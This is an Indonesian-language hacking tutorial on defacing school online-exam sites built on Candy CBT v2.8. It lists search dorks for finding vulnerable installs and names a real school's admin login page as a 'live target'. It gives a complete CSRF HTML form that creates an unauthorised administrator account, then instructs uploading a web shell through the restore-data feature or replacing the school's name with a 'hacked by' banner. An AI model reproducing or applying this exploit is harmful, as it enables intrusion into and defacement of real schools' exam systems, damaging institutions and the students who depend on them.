CARA DEFACE CANDY CBT ADD ADMIN + LIVE TARGET


 


Halo teman teman,

Ya kali ini seperti di judul saya akan membawakan tutorial Deface situs ujian/unbk/ujianonlen yaitu CANDY CBT ADD ADMIN


Seperti biasa, buat belajar saya siapin live target: https://elearning.smpn1panguragan.sch.id/admin/login.php


Bahan²

Dork: © Candy CBT v2.8.0 inurl:login.php 2021 

intext:"Support By Candy CBT V2.8"

Shell(buat jaga jaga)

Csrf cbt

Exploit: admin/login.php



Kalian dorking dulu, masukin exploit di belakang alamat web contoh: site.com/admin/login.php


Nah kalo vuln maka akan seperti ini:



Oke langsung ke csrf, csrf nya kalian copy dibawah ini save dengan format .html

<html>

<head></head>

<body>

<form action="site.com/admin/?pg=pengawas" method="post">

<label>nip</label>

<input type="text" name="nip" value="123761717" required="true" />

<br>

<label>nama</label>

<input type="text" name="nama" required="true" />

<br>

<label>username</label>

<input type="text" name="username" required="true" />

<br>

<label>password</label>

<input type="password" name="pass1" required="true" />

<br>

<label>ulang password</label>

<input type="password" name="pass2" required="true" />

<br>

<button type="submit" name="submit">simpan</button>

</form>

</body>

</html>


Bagian site.com ganti dengan web yang kalian dapat tadi


Jika sudah save->buka file paket chrome



Kalian isi username password terserah kalian, asal kalian inget, terus klik submit nah kalo berhasil maka akan kembali ke halaman login admin lagi


Kalian login pake username kalian buat barusan nah maka akan ke dashboard seperti ini



Kalian klik pengaturan->klik restore data->upshel kalian jika ga bisa kalian edit aja nama sekolah, judul sekolah paket heked by kalian



Nah oke udah itu aja semoga bermanfaat

أحدث أقدم